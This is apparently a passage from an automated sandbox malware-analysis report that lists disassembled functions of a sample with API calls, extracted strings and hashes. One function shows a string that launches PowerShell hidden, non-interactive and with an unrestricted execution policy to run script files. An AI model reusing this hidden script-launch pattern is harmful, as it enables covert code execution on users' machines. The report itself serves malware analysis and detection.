                                                    Function 0052869E Relevance: .3, Instructions: 344COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7be8a75a403495be592ab5eec0968c97b00952965cd856fd8e90f32d4fc012c
                                                    • Instruction ID: f1276578d31832edcd9ee17b6267adb04ccfeb44ffd56ca5831cb623fab30097
                                                    • Opcode Fuzzy Hash: d7be8a75a403495be592ab5eec0968c97b00952965cd856fd8e90f32d4fc012c
                                                    • Instruction Fuzzy Hash: 10C1CF309026668FCB28CFA8E49467ABFA1FF57310F684A19D492973D1CF31AC46CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00365BE0 Relevance: .1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d30655d3cb1d7661b2d723cfc71ae6a9df24c20fd5c6d86490fc99799677374
                                                    • Instruction ID: bccb1647b3fa8c55b7c06a0fc6f2ca04ad9063e4ef437e53fe7750e659034674
                                                    • Opcode Fuzzy Hash: 3d30655d3cb1d7661b2d723cfc71ae6a9df24c20fd5c6d86490fc99799677374
                                                    • Instruction Fuzzy Hash: E97107B1801B48CFE761CF78C94478ABBF0BB05324F148A5DD4A99B3D1D3B9A608CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00368280 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 061dc358492418f98eed4bc354e5c4725e7ee053de0c910e8cc351d4a7dc5dcf
                                                    • Instruction ID: e01d174825f7d50576b9a3d93ca7f6aa6c4a375a6881ccaf042466950bd93a82
                                                    • Opcode Fuzzy Hash: 061dc358492418f98eed4bc354e5c4725e7ee053de0c910e8cc351d4a7dc5dcf
                                                    • Instruction Fuzzy Hash: 4F215BB1804B88CFD710CF68C90478ABFF4FB09318F11869ED4559B791E7B5AA44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00368840 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 903b3a4479bc25b4263cd06491b9c03484b1c11cd36dd2034f03ac28d4746290
                                                    • Instruction ID: 62d8b9882614215e56ace5145655e41aee7919de1ba45d6ae72abf33ccd922b6
                                                    • Opcode Fuzzy Hash: 903b3a4479bc25b4263cd06491b9c03484b1c11cd36dd2034f03ac28d4746290
                                                    • Instruction Fuzzy Hash: 452149B1804788CFD710CF68C94478ABBF4FB0A314F11869ED4559B791E7B5AA04CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053A0DB Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0866fea2c0c0d676fdd498255391d95e4fe85f2c09373f032c99e64a20d5d3e
                                                    • Instruction ID: fb166dc2c5b8e1af0e14518e37fe1fb15b4070ef2a30784daef2d962331404c8
                                                    • Opcode Fuzzy Hash: f0866fea2c0c0d676fdd498255391d95e4fe85f2c09373f032c99e64a20d5d3e
                                                    • Instruction Fuzzy Hash: BDF03932A11324AFCB26CB48D81AA99B7A9EB85B61F11409AF541EB251C7B0DE00C7C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053A11F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                    • Instruction ID: 36261759a45d5ddd274d2b38335dd9100c6415b5f8e734ac3066fdc3082ef8ae
                                                    • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                    • Instruction Fuzzy Hash: E5E04672915228EBCB14DBAC895898AF7BCFB85B00F110496B541D3200C2B0DE00C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0052B5D7 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                    • Instruction ID: ce01fb6047ad7f0641107275164497ea547bc22bfaee1ed57f01d0052cd854ce
                                                    • Opcode Fuzzy Hash: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                    • Instruction Fuzzy Hash: 77C08C342009904BDE29891893B23A67794BBD3782F80048CC9020F683FB1EDC82D711
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A6AA0 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 335COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Unable to get a temp file for script output, temp path: , xrefs: 004A6BAF
                                                    • <3[, xrefs: 004A6DA3
                                                    • Unable to retrieve PowerShell output from file: , xrefs: 004A6DFE
                                                    • Unable to create process: , xrefs: 004A6CA4
                                                    • txt, xrefs: 004A6B73
                                                    • Unable to find file , xrefs: 004A6AD3
                                                    • Unable to retrieve exit code from process., xrefs: 004A6E21
                                                    • ps1, xrefs: 004A6B46, 004A6B58, 004A6B62
                                                    • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 004A6BFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <3[$Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                    • API String ID: 0-3121538646
                                                    • Opcode ID: 8008defabb2d97217af0f36540040bcdc674bf3fdacf7731b2b1ca137e261fe5
                                                    • Instruction ID: 5dbda0b700a747d94d8e3ba21fad87cf1643eb4b52d2f74c2a4cbe297c4d7892
                                                    • Opcode Fuzzy Hash: 8008defabb2d97217af0f36540040bcdc674bf3fdacf7731b2b1ca137e261fe5
                                                    • Instruction Fuzzy Hash: B9C1D030D00609AFDB11DFA8CD05BAEBBB5FF16310F148259F514AB291DB78AA04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004761C0 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 414libraryloaderthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(0063C5D0,D13B3340,00000000), ref: 00476363
                                                    • EnterCriticalSection.KERNEL32(0063C5D0,D13B3340), ref: 00476378
                                                    • GetCurrentProcess.KERNEL32 ref: 00476385
                                                    • GetCurrentThread.KERNEL32 ref: 00476393
                                                    • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 0047642D
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00476434
                                                    • __Init_thread_footer.LIBCMT ref: 00476448
                                                    • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 0047667E
                                                    • LeaveCriticalSection.KERNEL32(0063C5D0,?,00000000), ref: 004767BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                    • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                    • API String ID: 1326996155-80696534
                                                    • Opcode ID: ae1d2480768d0d0518ef87ff843811bf4300e2c47d5d50d847d2d12bae86bab5
                                                    • Instruction ID: 652c29c52b4bb23af6a1e5433244f2be9b9509371ff240473f7114e3c0c90971
                                                    • Opcode Fuzzy Hash: ae1d2480768d0d0518ef87ff843811bf4300e2c47d5d50d847d2d12bae86bab5
                                                    • Instruction Fuzzy Hash: 66F112719006589FDB24DF24CC89BEEBBB6BF55301F1042EAE409A7292DB755B84CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004762F0 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 296libraryloaderthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(0063C5D0,D13B3340,00000000), ref: 00476363
                                                    • EnterCriticalSection.KERNEL32(0063C5D0,D13B3340), ref: 00476378
                                                    • GetCurrentProcess.KERNEL32 ref: 00476385
                                                    • GetCurrentThread.KERNEL32 ref: 00476393
                                                    • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 0047642D
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00476434
                                                    • __Init_thread_footer.LIBCMT ref: 00476448
                                                    • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 0047667E
                                                    • LeaveCriticalSection.KERNEL32(0063C5D0,?,00000000), ref: 004767BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                    • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                    • API String ID: 1326996155-80696534
                                                    • Opcode ID: 8c6a97fff6cbb38d6a40d32ffe7fbec15be93c39ac1b7c58cb4194c46b79af45
                                                    • Instruction ID: 608dd5a725077ca06959acdee516f74d77e5f4705d84731c573e5e5803bb5952
                                                    • Opcode Fuzzy Hash: 8c6a97fff6cbb38d6a40d32ffe7fbec15be93c39ac1b7c58cb4194c46b79af45
                                                    • Instruction Fuzzy Hash: A5D1BD71900A689FDB24DF24CC49BEEBBB5BF55305F0041DAE409A7291DB795B88CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A0A30 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 231memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004B3820: LoadLibraryW.KERNEL32(Advapi32.dll,D13B3340), ref: 004B38B1
                                                      • Part of subcall function 004B3820: GetLastError.KERNEL32 ref: 004B38DF
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0AE2
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0AF3
                                                    • LocalAlloc.KERNEL32(00000040,00000014), ref: 004A0B68
                                                    • GetLastError.KERNEL32 ref: 004A0B86
                                                    • LocalFree.KERNEL32(00000000), ref: 004A0B97
                                                    • GetLastError.KERNEL32 ref: 004A0BB6
                                                    • LocalFree.KERNEL32(00000000), ref: 004A0BC7
                                                    • CreateDirectoryW.KERNEL32(?,?), ref: 004A0BF0
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0C44
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0CA7
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0CB1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Local$Free$ErrorLast$AllocCreateDirectoryLibraryLoad
                                                    • String ID: Everyone$qT$qT
                                                    • API String ID: 1481213927-1031658294
                                                    • Opcode ID: 1b7a27d488e076ca6f74dde7ba9c20d720c8f6e608506bbd404fc79ce0351372
                                                    • Instruction ID: 2ea31a23f4b7ba6ae430a7810908f153f2d4eb701c15a2884907bb3a0b5e9ec9
                                                    • Opcode Fuzzy Hash: 1b7a27d488e076ca6f74dde7ba9c20d720c8f6e608506bbd404fc79ce0351372
                                                    • Instruction Fuzzy Hash: BF913BB1E01209ABEF14DFE5D998B9FBBB8BF15304F14411AE401AB390DB799904CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B3820 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 390libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(Advapi32.dll,D13B3340), ref: 004B38B1
                                                    • GetLastError.KERNEL32 ref: 004B38DF
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 004B38F5
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004B390E
                                                    • GetLastError.KERNEL32 ref: 004B391B
                                                    • GetLastError.KERNEL32 ref: 004B3B09
                                                    • GetLastError.KERNEL32 ref: 004B3B6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                    • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                    • API String ID: 3460774402-1129428314
                                                    • Opcode ID: 37ce0a12e9305e2f8672961cb5c4bdf4891a33276d2d3d9c4765be6c5fe347c6
                                                    • Instruction ID: 01abaedab528f04e769ce9957673bcb93348667d7a157c5942f85a9d652e940d
                                                    • Opcode Fuzzy Hash: 37ce0a12e9305e2f8672961cb5c4bdf4891a33276d2d3d9c4765be6c5fe347c6
                                                    • Instruction Fuzzy Hash: 73F18BB1D01209AFDF10DF95D945BEEBBB4FF05311F20421AE914B7280E778AA49CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049F8F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 192fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(006394D0,D13B3340,?,00000010), ref: 0049F92C
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • EnterCriticalSection.KERNEL32(00000010,D13B3340,?,00000010), ref: 0049F939
                                                    • WriteFile.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F96B
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F974
                                                    • WriteFile.KERNEL32(00000000,00495687,94D0B9EC,00591D8D,00000000,005B326C,00000001,?,?,000000FF,00000000), ref: 0049F9F6
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F9FF
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA35
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA3E
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,005B5F2C,00000002,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA9F
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FAA8
                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FAD8
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                    • String ID: ,_[$l2[
                                                    • API String ID: 201293332-1480465998
                                                    • Opcode ID: b5539c806606ca5d8e90294acab5cacba9991b0b2a8976695763b6dd7b2b1cc3
                                                    • Instruction ID: 1187ecadc61af52c037603bdc814a98fd049b0b133553bd517c36a71be2047e3
                                                    • Opcode Fuzzy Hash: b5539c806606ca5d8e90294acab5cacba9991b0b2a8976695763b6dd7b2b1cc3
                                                    • Instruction Fuzzy Hash: 6A619D70900644EFDB01DF68DD49BAABFB4FF15310F148169F805E72A1DB74A918DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048A490 Relevance: 21.5, APIs: 4, Strings: 8, Instructions: 455COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,D13B3340), ref: 0048A4F9
                                                    • IsWow64Process.KERNEL32(00000000), ref: 0048A500
                                                      • Part of subcall function 0046C2F0: _wcsrchr.LIBVCRUNTIME ref: 0046C329
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0048A581
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0048A617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
